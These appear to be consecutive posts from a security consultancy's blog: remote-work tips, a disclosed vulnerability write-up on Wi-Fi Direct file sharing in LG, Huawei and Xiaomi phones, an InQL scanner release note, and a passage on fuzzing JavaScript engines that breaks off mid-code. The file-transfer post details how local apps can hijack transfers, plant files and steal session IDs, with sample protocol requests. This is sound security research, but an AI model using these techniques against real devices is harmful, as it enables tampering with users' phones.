5 standard rules we follow and 7 myths that we believe are false

Five Golden Rules

1. “Work” separated from the “Home” zone

The most effective solution is to work in a separate and dedicated room, which automatically becomes your office. It is important to physically separate the workplace from the rest of the house somehow, e.g. with a screen, small bookcase or curtain. The worst thing you can do is work on the couch or bed where you usually rest. We try not to review source code from the place where we normally eat snacks, or debug an application in the same place we sleep. If possible, work at a desk. It will also be easier for you to mobilize yourself for a specific activity. Also, make sure that members of your household, especially young children, do not play in your “office area”. It will be best if this “home office space” belongs exclusively to you.

2. The importance of a workplace

Prepare a desk with adequate lighting and a comfortable chair. We emphasize the need for a functional, ergonomic chair, and not simply an armchair. It’s about working effectively. The time to relax will come later. Arrange everything so that you work with ease. Notebooks and other materials should be tidied up on the desk and kept neat. This will be a clear, distinguishing feature of the workplace. Family members should know that this is a work area from the way it looks. It will be easier for them to get used to the fact that instead of “going to work,” work-related responsibilities will be performed at home. Also, this setup gives an opportunity to make security testing more efficient, for example by setting up bigger screens and ready-to-use testing equipment.

3. Control your time (establish a routine)

A flexible working time can be treacherous. There are times when an eight hour working day is sufficient to complete an important project. On the other hand, there are situations where various distractions can take attention away from an assigned task. In order to avoid this type of scenario, fixed working hours must be established. For example, some Doyensec employees use BeFocused and Timing apps to regulate their time. Intuitive and user friendly applications will help you balance your private and professional life and will also remind you when it’s time to take a break. Working long hours with no breaks is the main source of burnout.

4. Find excuses to leave your house (vary the routine)

Traditional work is usually based on a structured day spent in an office environment. The day is organized into work sessions and breaks. When working at home, on the other hand, time must be allotted for non-work related responsibilities on a more subjective basis. It is important for the routine to be elastic enough to include breaks for everything from physical activity (walks) to shopping (groceries) and social interaction. Leaving the house regularly is very beneficial. A break will bring on a refreshed perspective. The current pandemic is obviously the reason why people spend more time inside. Outdoor physical activities are very important for keeping our minds fresh, and a fresh dose of endorphins is always welcome. As proof, our best bugs are usually discovered after a run or a walk outside!

5. Avoid distractions

While this sounds like simple and intuitive advice, avoiding distractions is actually really difficult! In general it’s good to turn off notifications on your computer or phone, especially while working. We trust our people and they don’t have to be immediately 100% reachable when working. As long as our consultants provide updates and results when needed, it is perfectly fine to shut down email and other communication channels. Depending on personal preference, some individuals require complete silence, while others can accomplish their work while listening to music. If you belong to that category of people who cannot work in absolute silence and normal music levels are too intense, consider using white noise. There are applications available that you can use to create a neutral soundtrack that helps you to concentrate. You can easily follow our recommendation on Spotify: something calm, maybe jazz style or classy.

Seven Myths

Let’s now talk about some myths related to remote work:

1. Remote employees have no control over projects

At Doyensec, we have successfully delivered hundreds of projects that were done exclusively remotely. If we are delivering a small project, we usually allocate one security researcher who is able to start the project from scratch and produce a high-quality deliverable, but sometimes we have 2-3 consultants working on the same engagement and the outcome is of the same quality. Most of our communication goes through (PGP-encrypted) emails. An instant messenger can help a great deal when answers are needed quickly. The real challenge is in hiring the right people who can control the project regardless of their physical location. When hiring for our company, we look at both technical and project management skills. According to Jason Fried and David Heinemeier Hansson, 37signals co-founders, you shouldn’t hire people you don’t trust (Remote). We totally agree with this statement.

2. Remote employees cannot learn from colleagues

The obvious fact is that it is easier to learn when a colleague is physically in the same office and not on the other side of the screen, but we have learned to deal with this problem. Part of our organizational culture is a “screen sharing session” where two people working on the same project analyze source code and look for vulnerabilities together. During our weekly meetings, we also organize a session called “best bugs” where we all share the most interesting findings from a given week.

3. Remote work = lack of work & life balance?

If a person is not able to organize his/her work day properly, it is easy to drag out the work day from early in the morning to midnight instead of completing everything within the expected eight hours. Self discipline and iterative improvements are the key solutions for an effective day. Work/life balance is important, but who said that forcing a 9am-5pm schedule is the best way to work? Wouldn’t it be better to visit a grocery store or a gym in the middle of the day when no one is around and finish work in the evening?

4. Employees not under control

Healthy remote companies rely on trust. If they didn’t then they wouldn’t offer remote work opportunities in the first place. People working at home carry out their duties like everyone else. In fact, planning activities such as gym-workouts, family time, and hobbies is much easier thanks to the flexible schedule. You can freely organize your work day around important family matters or other responsibilities if necessary.

Companies should be focused on having better hiring processes and ensuring long-term retention instead of being overly concerned about the risk of “remote slacking”. In fact, our experience in the past four years would actually suggest that it is more challenging to ensure a healthy work/life balance since our researchers are sufficiently motivated and love what they do.

5. Remote work means working outside the employer’s office

It should be understood that not all remote work is the same. If you work in customer service and receive regular calls from customers, for example, you might be working from a confined space in a separate room at home. Remote work means working outside the employer’s office. It can mean working in a co-working space, cafeteria, hotel or any other place where you have a good Internet connection.

6. Remote work is lonely

This one is a bit tricky since it’s technically true and false. It’s true that you usually sit at home and work alone, but in our security work we’re constantly exchanging information via e-mails, Mattermost, Signal, etc. We also have Hangouts video meetings where we can sync up. If someone feels personally isolated, we always recommend signing up for some activities like a gym, book club or other options where like-minded people associate. Lonely individuals are less productive over the long run. Compared to the traditional office model, remote work requires looking for friends and colleagues outside the company - which isn’t a bad thing after all.

7. Remote work is for everyone

We strongly believe that there are people who will still prefer an onsite job. Some individuals need constant contact with others. They also prefer the standard 9am-5pm work schedule. There is nothing wrong with that. People that are working remotely have to make more decisions on their own and need stronger self-discipline. Since they are unable to engage in direct consultation with co-workers, a reduction of direct communication occurs. Nevertheless, remote work will become something “normal” for an increasing number of people, especially for the Y and Z generation.

Novel Abuses On Wi-Fi Direct Mobile File Transfers

2020-12-10T00:00:00+01:00

The Wi-Fi Direct specification (a.k.a. “peer-to-peer” or “P2P” Wi-Fi) turned 10 years old this past April. This 802.11 extension has been available since Android 4.0 through a dedicated API that interfaces with a device’s built-in hardware, letting devices connect directly to each other via Wi-Fi without an intermediate access point. Multiple mobile vendors and early adopters of this technology quickly leveraged the standard to provide their products with a fast and reliable file transfer solution.

After almost a decade, a huge majority of mobile OEMs still rely on custom locked-in implementations for file transfer, even if large cross-vendor alliances (e.g. the “Peer-to-Peer Transmission Alliance”) and big players like Google (with the recent “Nearby Share” feature) are moving to change this in the near future.

During our research, three popular P2P file transfer implementations were studied (namely Huawei Share, LG SmartShare Beam, Xiaomi Mi Share) and all of them were found to be vulnerable due to an insecure shared design. While some groundbreaking research work attacking the protocol layer has already been presented by Andrés Blanco during Black Hat EU 2018, we decided to focus on the application layer of this particular class of custom UPnP service.

This blog post will cover the following topics:

A Recurrent Design Pattern
LG SmartShare Beam
- What could go wrong?
Huawei Share
- Abusing FTS/FTC Crashes
Xiaomi Mi Share
Conclusions

A Recurrent Design Pattern

In the majority of OEM solutions, mobile file transfer applications will spawn two servers:

A File Transfer Controller or Client (FTC), that will manage the majority of the pairing and transfer control flow
A File Transfer Server (FTS), that will check a session’s validity and serve the intended shared file

These two services are used for device discovery, pairing and sessions, authorization requests, and file transport functions. Usually they are implemented as classes of a shared parent application which orchestrate the entire transfer. These components are responsible for:

Creating the Wi-Fi Direct network
Using the standard UPnP phases to announce the device, the file service description (/description.xml), and events subscription
Issuing a UPnP remote procedure call to create a transfer request with another peer
Upon acceptance from the recipient, uploading the target file through an HTTP POST/PUT request to a defined location

An important consideration for the following abuses is that after a P2P Wi-Fi connection is established, its network interface (p2p-wlan0-0) is available to every application running on the user’s device having android.permission.INTERNET. Because of this, local apps can interact with the FTS and FTC services spawned by the file sharing applications on the local or remote device clients, opening the door to a multitude of attacks.

LG SmartShare Beam

SmartShare is a stock LG solution for connecting LG phones to other devices using Wi-Fi (DLNA, Miracast) or Bluetooth (A2DP, OPP). The Beam feature is used for file transfer among LG devices.

Just like other similar applications, an FTS (FileTransferTransmitter in com.lge.wfds.service.send.tx) and an FTC (FileTransferReceiver in com.lge.wfds.service.send.rx) are spawned and listening on ports 54003 and 55003.
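
Because these listeners are plain TCP services on the P2P interface, any local process can test whether they are reachable. A minimal sketch, assuming nothing beyond the Python standard library; the helper name is ours and is not part of SmartShare:

```python
import socket


def is_port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, unreachable hosts, and timeouts.
        return False
```

For instance, `is_port_open("192.168.49.1", 55003)` would check one of the ports above on the peer address that appears in the sample requests in this post.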

By way of example, the following HTTP requests demonstrate the FTC and the FTS in action whenever a file transfer session between two parties is requested. First, the FTS performs a CreateSendSession SOAP action:

POST /FileTransfer/control.xml HTTP/1.1
Connection: Keep-Alive
HOST: 192.168.49.1:55003
Content-Type: text/xml; charset="utf-8"
Content-Length: 1025
SOAPACTION: "urn:schemas-wifialliance-org:service:FileTransfer:1#CreateSendSession"
 
<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope
    xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <s:Body>
        <u:CreateSendSession
            xmlns:u="urn:schemas-wifialliance-org:service:FileTransfer:1">
            <Transmitter>Doyensec LG G6 Phone</Transmitter>
            <SessionInformation>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;MetaInfo
                xmlns=&quot;urn:wfa:filetransfer&quot;
                xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;
                xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xsi:schemaLocation=&quot;urn:wfa:filetransfer http://www.wi-fi.org/specifications/wifidirectservices/filetransfer.xsd&quot;&gt;&lt;Note&gt;1 and 4292012bytes File Transfer&lt;/Note&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;NoofItems&gt;1&lt;/NoofItems&gt;&lt;Item&gt;&lt;Name&gt;CuteCat.jpg&lt;/Name&gt;&lt;Size&gt;4292012&lt;/Size&gt;&lt;Type&gt;image/jpeg&lt;/Type&gt;&lt;/Item&gt;&lt;/MetaInfo&gt;
            </SessionInformation>
        </u:CreateSendSession>
    </s:Body>
</s:Envelope>

The SessionInformation node embeds an entity-escaped standard Wi-Fi Alliance schema, urn:wfa:filetransfer, transmitting a CuteCat.jpg picture. The file name (MetaInfo/Item/Name) is displayed in the file transfer prompt to show to the final recipient the name of the transmitted file. By design, after the recipient’s confirmation, a CreateSendSessionResponse SOAP response will be returned:
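
To make the nesting concrete, here is a minimal sketch of how an inner urn:wfa:filetransfer document can be entity-escaped into a SessionInformation node and how the displayed name is recovered from it. The function names are ours, and the inner document is trimmed to the fields visible in the request above; this is not LG's code:

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape


def build_meta_info(name: str, size: int, mime: str) -> str:
    """Build a single-item inner document in the urn:wfa:filetransfer namespace."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<MetaInfo xmlns="urn:wfa:filetransfer">'
        f"<Size>{size}</Size><NoofItems>1</NoofItems>"
        f"<Item><Name>{escape(name)}</Name><Size>{size}</Size>"
        f"<Type>{escape(mime)}</Type></Item></MetaInfo>"
    )


def wrap_session_information(meta_info: str) -> str:
    """Entity-escape the inner document so it travels as text inside the SOAP node."""
    escaped = escape(meta_info, {'"': "&quot;"})
    return "<SessionInformation>" + escaped + "</SessionInformation>"


def displayed_file_name(session_information: str) -> str:
    """Recover MetaInfo/Item/Name, the value shown in the recipient's prompt."""
    outer = ET.fromstring(session_information)
    # The parser has already unescaped the entities, so outer.text is XML again.
    inner = ET.fromstring(outer.text.encode("utf-8"))
    ns = {"ft": "urn:wfa:filetransfer"}
    return inner.find("ft:Item/ft:Name", ns).text
```

The point of the sketch is that the name shown to the user is simply whatever the sender places in this text node.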

HTTP/1.1 200 OK
Date: Sun, 01 Jun 2020 12:00:00 GMT
Connection: Keep-Alive
Content-Type: text/xml; charset="utf-8"
Content-Length: 404
EXT: 
SERVER: UPnPServer/1.0 UPnP/1.0 Mobile/1.0
 
<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope
    xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <s:Body>
        <u:CreateSendSessionResponse
            xmlns:u="urn:schemas-wifialliance-org:service:FileTransfer:1">
            <SendSessionID>33</SendSessionID>
            <TransportInfo>tcp:55432</TransportInfo>
        </u:CreateSendSessionResponse>
    </s:Body>
</s:Envelope>

This will contain the TransportInfo destination port that will be used for the final transfer:

PUT /CuteCat.jpeg HTTP/1.1
User-Agent: LGMobile
Host: 192.168.49.1:55432
Content-Length: 4292012
Connection: Keep-Alive
Content-Type: image/jpeg

.... .Exif..MM ...<redacted>

What could go wrong?

Unfortunately, this design suffers from many issues, such as:

A valid session ID isn’t required to finalize the transfer
Once a CreateSendSessionResponse is issued, no authentication is required to push a file to the opened RX port. Since the DEFAULT_HTTPSERVER_PORT for the receiver is hardcoded to be 55432, any application running on the sender’s or recipient’s device can hijack the transfer and push an arbitrary file to the victim’s storage, just by issuing a valid PUT request. On top of that, the current Session IDs are easily guessable, since they are randomly chosen from a small pool (WfdsUtil.randInt(1, 100));
File names and type can be arbitrarily changed by the sender
Since the transferred file name is never checked to reflect the one initially prompted to the user, it is possible for an attacker to specify a different file name or type from the one initially shown just by changing the PUT request path to an arbitrary value.
It is possible to send multiple files at once without user confirmation
Once the RX port (DEFAULT_HTTPSERVER_PORT) is opened, it is possible for an attacker to send multiple files in a single transaction, without prompting any notification to the recipient.
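
The three issues above all come down to checks that the receiver does not perform. A minimal sketch of what such checks could look like, under our own assumptions: the ApprovedTransfer record, its fields, and the idea of presenting the session token with the upload are hypothetical and are not part of the SmartShare protocol:

```python
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote


@dataclass
class ApprovedTransfer:
    session_id: str         # hypothetical: an unguessable token issued on acceptance
    file_name: str          # the name shown to the recipient in the prompt
    size: int               # the size announced in the session metadata
    consumed: bool = False  # set once the single approved upload has arrived


def check_put(approved: ApprovedTransfer, path: str,
              session_id: Optional[str], content_length: int) -> bool:
    """Accept a PUT only if it matches the transfer the user approved."""
    if approved.consumed:                       # one upload per approval
        return False
    if session_id != approved.session_id:       # the session must be presented
        return False
    if unquote(path.lstrip("/")) != approved.file_name:  # name must match the prompt
        return False
    if content_length != approved.size:         # size must match the announcement
        return False
    approved.consumed = True
    return True
```

With these checks, a PUT to a different path, a PUT without the token, and a second PUT after the first one would all be rejected.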

Because of the above design issues, any malicious third-party application installed on one of the peers’ devices may influence or take over any communication initiated by the legit LG SmartShare applications, potentially hijacking legit file transfers. A wormable malicious application could abuse this insecure design to flood the local or remote victim waiting for a file transfer, effectively propagating its malicious APK without user interaction required. An attacker could also abuse this design to implant arbitrary files or evidence on a victim’s device.

Huawei Share

Huawei Share is another file sharing solution included in Huawei’s EMUI operating system, supporting both Huawei terminals and those of its second brand, Honor.

In Huawei Share, an FTS (FTSService in com.huawei.android.wfdft.fts) and an FTC (FTCService in com.huawei.android.wfdft.ftc) are spawned and listening on ports 8058 and 33003. At a high level, the Share protocol resembles the LG SmartShare Beam mechanism, but without the same design flaws.

Unfortunately, the stumbling block for Huawei Share is the stability of the services: multiple HTTP requests that could respectively crash the FTCService or FTSService were identified. Since the crashes could be triggered by any third-party application installed on the user’s device and because of the UPnP General Event Notification Architecture (GENA) design itself, an attacker can still take over any communication initiated by the legit Huawei Share applications, stealing Session IDs and hijacking file transfers.

Abusing FTS/FTC Crashes

In the replicated attack scenario, Alice and Bob’s devices are connected and paired on a Wi-Fi Direct connection. Bob also unwittingly runs a malicious application with little or no privileges on his device. In this scenario, Bob initiates a file share through Huawei Share (1). His legit application will, therefore, send a CreateSession SOAP action through a POST request to Alice’s FTCService to get a valid SessionID, which will be used as an authorization token for the rest of the transaction. During a standard exchange, after Alice accepts the transfer on her device, a file share event notification (NOTIFY /evetSub) will fire to Bob’s FTSService. The FTSService will then be used to serve the intended file.

NOTIFY /evetSub HTTP/1.1
Content-Type: text/xml; charset="utf-8"
HOST: 192.168.49.1
NT: upnp:event
NTS: upnp:propchange
SID: uuid:e9400170-a170-15bd-802e-165F9431D43F
SEQ: 1
Content-Length: 218
Connection: close
 
<?xml version="1.0" encoding="utf-8"?>
<e:propertyset xmlns:e="urn:schemas-upnp-org:event-1-0">
   <e:property>
      <TransportStatus>1924435235:READY_FOR_TRANSPORT</TransportStatus>
   </e:property>
</e:propertyset>

Since an inherent time span exists between the manual acceptance of the transfer by Alice and its start, the malicious application could perform a request with an ad-hoc payload to trigger a crash of FTSService (2) and subsequently bind its own FTSService to the same port (3). Because of the UPnP event subscription and notification protocol design, the NOTIFY event including the SessionID (1924435235 in the example above) can now be intercepted by the fake FTSService (4) and used by the malicious application to serve arbitrary files.
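
The SessionID travels in clear text inside the event body, so whoever receives the NOTIFY can read it. A minimal sketch of extracting it from the sample event above; the function name is ours, and the "id:state" split is an assumption based only on that one sample:

```python
import xml.etree.ElementTree as ET

NOTIFY_BODY = """<?xml version="1.0" encoding="utf-8"?>
<e:propertyset xmlns:e="urn:schemas-upnp-org:event-1-0">
   <e:property>
      <TransportStatus>1924435235:READY_FOR_TRANSPORT</TransportStatus>
   </e:property>
</e:propertyset>"""


def parse_transport_status(body: str):
    """Return (session_id, state) from a GENA property-change event body."""
    root = ET.fromstring(body.encode("utf-8"))
    status = root.find(".//TransportStatus")  # the element carries no namespace
    if status is None or not status.text or ":" not in status.text:
        raise ValueError("no TransportStatus property in event body")
    session_id, state = status.text.strip().split(":", 1)
    return session_id, state
```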

The crashes are undetectable both to the device’s user and to the file recipient. Multiple crash vectors using malformed requests were identified, making the service systemically weak and exploitable.

Xiaomi Mi Share

Introduced with MIUI 11, Xiaomi’s MiShare offers AirDrop-like file transfer features between Mi and Redmi phones. Recently this feature was extended to be compatible with devices produced by the “Peer-to-Peer Transmission Alliance” (including vendors with over 400M users such as Xiaomi, OPPO, Vivo, Realme, Meizu).

Due to this transition, MiShare internally features two different sets of APIs:

One using bare HTTP requests, with many RESTful routes
One using mainly Websockets Secure (WSS) and only a handful of HTTPS requests

The websocket-based API is currently used by default for transfers between Xiaomi Devices and this is the one we assessed. As in other P2P solutions, several minor design and implementation bugs were identified:

The JSON-encoded parcel sent via WSS specifying the file properties is trusted, and its fileSize parameter is used to check whether there is enough space left on the device. Since this is the sender’s declared file size, a Denial of Service (DoS) exhausting the remaining space is possible.
Session tokens (taskId) are 19 digits long and a weak source of entropy (java.util.Random) is used to generate them.
Just like the other presented vendor solutions, any third-party application installed on the user’s device can meddle with MiShare’s exchange. While several DoS payloads crashing MiShare are also available, for this vendor the file transfer service is restarted very quickly, making the window of opportunity for an attack very limited.
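
To illustrate why java.util.Random is a weak source for session tokens, here is a Python port of its documented generator, a 48-bit linear congruential generator. How MiShare seeds the generator, or how it turns the output into a taskId, is not covered in this post, so the sketch only shows that the output is fully determined by a small internal state:

```python
MASK48 = (1 << 48) - 1
MULTIPLIER = 0x5DEECE66D
INCREMENT = 0xB


class JavaRandom:
    """Python port of the documented java.util.Random generator (48-bit LCG)."""

    def __init__(self, seed: int):
        # Java scrambles the initial seed with the multiplier.
        self.state = (seed ^ MULTIPLIER) & MASK48

    def _next(self, bits: int) -> int:
        self.state = (self.state * MULTIPLIER + INCREMENT) & MASK48
        value = self.state >> (48 - bits)
        # Interpret the result as a signed 32-bit integer, as Java's int cast does.
        return value - (1 << 32) if value >= (1 << 31) else value

    def next_int(self) -> int:
        return self._next(32)


# Two generators with the same seed produce the same "random" sequence.
a, b = JavaRandom(1234), JavaRandom(1234)
same = [a.next_int() for _ in range(3)] == [b.next_int() for _ in range(3)]
```

A token built from such values is only as unpredictable as the 48-bit state behind it, which is why a cryptographically secure generator (java.security.SecureRandom on Java) is the usual choice for session identifiers.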

On a brighter note, the Mi Share protocol design was hardened using per-session TLS certificates when communicating through WSS and HTTPS, limiting the exploitability of many security issues.

Conclusions

Some of the attacks described can be easily replicated in other existing mobile file transfer solutions. While the core technology has always been there, OEMs still struggle to defend their own P2P sharing flavors. Other common vulnerabilities found in the past include similar improper access control issues, path traversals, XML External Entity (XXE), improper file management, and monkey-in-the-middle (MITM) of the connection.

All vulnerabilities briefly described in this post were responsibly disclosed to the respective OEM security teams between April and June 2020.

InQL Scanner v3 - Just Released!

2020-11-19T00:00:00+01:00

We’re very happy to announce that a new major release of InQL is now available on our Release Page.

If you’re not familiar, InQL is a security testing tool for GraphQL technology. It can be used as a stand-alone script or as a Burp Suite extension.

By combining InQL v3 features with the ability to send query templates to Burp’s Repeater, we’ve made it very easy to exploit vulnerabilities in GraphQL queries and mutations. This drastically lowers the bar for security research against GraphQL tech stacks.

Here’s a short intro for major features that have been implemented in version 3.0:

New IIR (Introspection Intermediate Representation) and Precise Query Generation

InQL now leverages an internal introspection intermediate representation (IIR) to use details obtained from type introspection and generate arbitrarily nested queries with support for any scalar types, enumerations, arrays, and objects. IIR enables seamless “Send to Repeater” functionality from the Scanner to the other tool components (Repeater and GraphQL console).
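
As a rough illustration of generating nested queries from type information, the sketch below walks a tiny hand-written schema summary and emits a query template up to a given depth. The SCHEMA dictionary and function names are hypothetical and far simpler than InQL's actual IIR:

```python
SCALARS = {"String", "Int", "Float", "Boolean", "ID"}

# Hypothetical schema summary: type name -> {field name: field type name}.
SCHEMA = {
    "Query": {"user": "User"},
    "User": {"id": "ID", "name": "String", "friends": "User"},
}


def build_selection(type_name: str, depth: int) -> str:
    """Build a selection set, descending into object fields while depth allows."""
    fields = []
    for field, field_type in SCHEMA[type_name].items():
        if field_type in SCALARS:
            fields.append(field)
        elif depth > 0:
            fields.append(f"{field} {build_selection(field_type, depth - 1)}")
    return "{ " + " ".join(fields) + " }"


def build_query(depth: int = 2) -> str:
    return "query " + build_selection("Query", depth)
```

The depth limit is what keeps a self-referencing type such as User from nesting forever.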

New Cycles Detector

The new IIR allows us to inspect cycles in defined GraphQL schemas simply by accessing GraphQL endpoints that have introspection enabled. In this context, a cycle is a path in the GraphQL schema that uses recursive objects in a way that leads to unlimited nesting. The detection of cycles is incredibly useful and automates tedious testing procedures by employing graph solving algorithms. In some of our past client engagements, this tool was able to find millions of cycles in a matter of minutes.
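
The idea can be sketched with a plain depth-first search over a graph whose nodes are object types and whose edges are object-typed fields. This is our own simplified illustration, not the algorithm InQL ships, and it would not scale to the schema sizes mentioned above:

```python
def find_cycles(graph: dict) -> list:
    """Return simple cycles as lists of type names, found with a depth-first search."""
    cycles = []
    seen = set()

    def visit(node, path):
        for nxt in graph.get(node, ()):
            if nxt in path:
                cycle = path[path.index(nxt):]
                # Normalise the rotation so each cycle is reported once.
                start = cycle.index(min(cycle))
                key = tuple(cycle[start:] + cycle[:start])
                if key not in seen:
                    seen.add(key)
                    cycles.append(list(key))
            else:
                visit(nxt, path + [nxt])

    for root in graph:
        visit(root, [root])
    return cycles


# Hypothetical schema: User.posts -> Post, Post.author -> User, User.friends -> User.
TYPE_GRAPH = {"Query": ["User"], "User": ["Post", "User"], "Post": ["User"]}
```

Here `find_cycles(TYPE_GRAPH)` reports the User/Post loop and the User self-reference, each of which allows a query to nest without bound.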

New Request Timer

InQL 3.0.0 has an integrated Query Timer. This Query Timer is a reimagination of Request Timer, which can filter for query name and body. The Query Timer is enabled by default and is especially useful in conjunction with the Cycles detector. A tester can switch between GraphQL editor modes (Repeater and GraphiQL) to identify DoS queries. Query Timer demonstrates the ability to attack such vulnerable GraphQL endpoints by counting each query’s execution time.

Bug fixes and future development

We’re really thankful to all of you for reporting issues in our previous releases. We have implemented various fixes for functional and UX bugs, including a tricky bug caused by a sudden Burp Suite change in the latest 2020.11 update.

We’re excited to see the community embracing InQL as the “go-to” standard for GraphQL security testing. More features are on the way, so keep your requests and bug reports coming via our GitHub Issues page. Your feedback is much appreciated!

This project was made with love in the Doyensec Research Island.

Fuzzing JavaScript Engines with Fuzzilli

2020-09-09T00:00:00+02:00

Background

As part of my research at Doyensec, I spent some time trying to understand current fuzzing techniques, which could be leveraged against the popular JavaScript engines (JSE) with a focus on V8. Note that I did not have any prior experience with fuzzing JSEs before starting this journey.

Dharma

My experimentation started with a context-free grammar (CFG) generator: Dharma. I quickly realized that the grammar rules for generating valid JavaScript code that does something interesting are too complicated. Type confusion and JIT engine bugs were my primary focus, however, most of the generated code was syntactically incorrect. Every statement was wrapped in a try/catch block to deal with the incorrect code. After a few days of fuzzing, I was only able to find out-of-memory (OOM) bugs. If you want to read more about V8 JIT and Dharma, I recommend this thoughtful research.

Dharma allows you to specify three sections for various purposes. The first one is called variable and lets you define variables that are later used in the value section. The last one, variance, is commonly used to specify the starting symbol for expanding the CFG tree.

The linkage is implemented inside the value section, and a nice feature of Dharma is that here you only define the assignment rules or function invocations, and the variables are automatically created when needed. However, if we assign a variable of type A to one of a different type B, we have to include all the type A rules inside the type B object.

Here is an example of such a rule:

try { !TYPEDARRAY! = !ARRAYBUFFER!.slice(!ANY_FUNCTION!, !ANY_FUNCTION!) } catch (e) {};

As you can imagine, without writing an additional library, the code quickly becomes complicated and clumsy.
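
To give a feel for this style of generation, here is a minimal sketch of a context-free grammar expander that uses the same !SYMBOL! notation and wraps the result in try/catch. The rules are hypothetical and the expander is our own toy, not Dharma:

```python
import random
import re

# Hypothetical rules, loosely modelled on the example rule above.
RULES = {
    "TYPEDARRAY": ["new Uint8Array(8)", "new Float64Array(4)"],
    "ARRAYBUFFER": ["new ArrayBuffer(16)", "!TYPEDARRAY!.buffer"],
    "ANY_FUNCTION": ["0", "1", "(function () { return 2; })()"],
    "STATEMENT": ["var a = !ARRAYBUFFER!.slice(!ANY_FUNCTION!, !ANY_FUNCTION!)"],
}
SYMBOL = re.compile(r"!([A-Z_]+)!")


def expand(text: str, rng: random.Random) -> str:
    """Replace !SYMBOL! references until only terminals remain."""
    while True:
        match = SYMBOL.search(text)
        if match is None:
            return text
        choice = rng.choice(RULES[match.group(1)])
        text = text[:match.start()] + choice + text[match.end():]


def generate(seed: int) -> str:
    statement = expand("!STATEMENT!", random.Random(seed))
    # Wrap every statement so that an invalid one does not stop the sample.
    return "try { " + statement + " } catch (e) {};"
```

Even in this toy, every new type relationship means another hand-written rule, which is the maintenance problem described above.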

Fuzzing with coverage is mandatory when targeting popular software, as a pure black-box approach only scratches the surface of the attack surface. Coverage can be easily obtained when the binary is compiled with a specific Clang (compiler frontend, part of the LLVM infrastructure) flag. Part of the output can be seen in the picture below. In my case, it was only useful for manual code review and grammar adjustment, as there was no convenient way to implement a mutator on the JavaScript source code.

Fuzzilli

As an alternative approach, I started to play with Fuzzilli, which I think is an incredible and still very underrated fuzzer, implemented by Samuel Groß (aka Saelo). Fuzzilli uses an intermediate representation (IR) language called FuzzIL, which is perfectly suitable for mutating. Moreover, any program in FuzzIL can always be converted (lifted) to valid JavaScript code.

At that time, the supported targets were V8, SpiderMonkey, and JavaScriptCore. As these engines continuously undergo widespread fuzzing, I instead decided to implement support for a different JavaScript Engine. I was also interested in the communication protocol between the fuzzer and the engine, so I considered expanding this fuzzer to be an excellent exercise.

I decided to add support for JerryScript. In the past years, numerous security issues have been discovered on this target by Fuzzinator, which uses the ANTLR v4 testcase generator Grammarinator. Those bugs were investigated and fixed, so I wanted to see if Fuzzilli could find something new.

Fuzzilli Basics

REPRL

The best available high-level documentation about Fuzzilli is Samuel’s Master’s thesis, where it was introduced. I strongly recommend reading it, as this article only summarizes some of its novel ideas.

Many modern fuzzer architectures use Forkserver. The idea behind it is to run the program until the initialization is complete, but before it processes any input. Right after that, the input from the fuzzer is read and passed to a newly forked child. The overhead is low since the initialization possibly only occurs once, or when a restart is needed (e.g. in the case of continuous memory leaks).

Fuzzilli uses the REPRL approach, which saves the overhead caused by fork(); the measured execution per sample could be ~7 times faster. The JavaScript engine is modified to read the input from the fuzzer, and after it executes the sample, it obtains the coverage. The crucial part is to reset the state, which is normally (obviously) not done, as the engine uses the context of the already defined variables. In contrast with the Forkserver, we need a rudimentary knowledge of the engine. It is useful to know how the engine’s string representation is internally implemented to feed the input or add additional commands.
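
As an analogy only, the loop below shows the read-eval-print-reset idea in Python: a single long-lived process evaluates each sample in a fresh scope instead of forking a child per input. It does not implement Fuzzilli's actual protocol, and the function name is ours:

```python
def reprl(samples):
    """Read-eval-print-reset loop: one long-lived process, fresh state per sample."""
    results = []
    for source in samples:           # read the next sample
        scope = {}                   # reset: nothing survives from earlier samples
        try:
            exec(source, scope)      # eval
            status = "ok"
        except Exception as exc:
            status = type(exc).__name__
        results.append(status)       # print: report the outcome to the fuzzer
    return results
```

If the reset step were skipped, the second sample in `reprl(["x = 1", "y = x + 1"])` would see the variable left behind by the first one, and results would depend on execution order.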

Coverage

LLVM gives a convenient way to obtain the edge coverage. By providing the -fsanitize-coverage=trace-pc-guard compiler flag to Clang, we can receive a pointer to the start and end of the regions, which are initialized by the guard number, as can be read in the LLVM documentation:

extern "C" void __sanitizer_cov_trace_pc_guard_init(uint32_t *start,
                                                    uint32_t *stop) {
  static uint64_t N;  // Counter for the guards.
  if (start == stop || *start) return;  // Initialize only once.
  printf("INIT: %p %p\n", start, stop);
  for (uint32_t *x = start; x < stop; x++)
    *x = ++N;  // Guards should start from 1.
}

The guard regions are included in the JSE target. This means that the JavaScript engine must be modified to accommodate these changes. Whenever a branch is executed, the __sanitizer_cov_trace_pc_guard callback is called. Fuzzilli uses a POSIX shared memory object (shmem) to avoid the overhead when passing the data to the parent process. Shmem represents a bitmap, where the visited edge is set and, after each JavaScript input pass, the edge guards are reinitialized.
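
The bookkeeping can be modelled in a few lines. In this minimal sketch, a bytearray stands in for the shared memory region and the class and method names are ours, so it only illustrates the bitmap logic and not Fuzzilli's implementation:

```python
class EdgeBitmap:
    """One bit per edge guard; guards are numbered from 1, as in the init callback."""

    def __init__(self, num_edges: int):
        size = (num_edges + 7) // 8
        self.current = bytearray(size)  # edges hit by the sample being executed
        self.total = bytearray(size)    # edges hit by any sample so far

    def hit(self, guard: int) -> None:
        """Mark the edge for this guard as visited."""
        index = guard - 1
        self.current[index // 8] |= 1 << (index % 8)

    def finish_sample(self) -> int:
        """Merge the sample into the total, clear it, and return the new-edge count."""
        new_edges = 0
        for i, byte in enumerate(self.current):
            fresh = byte & ~self.total[i]
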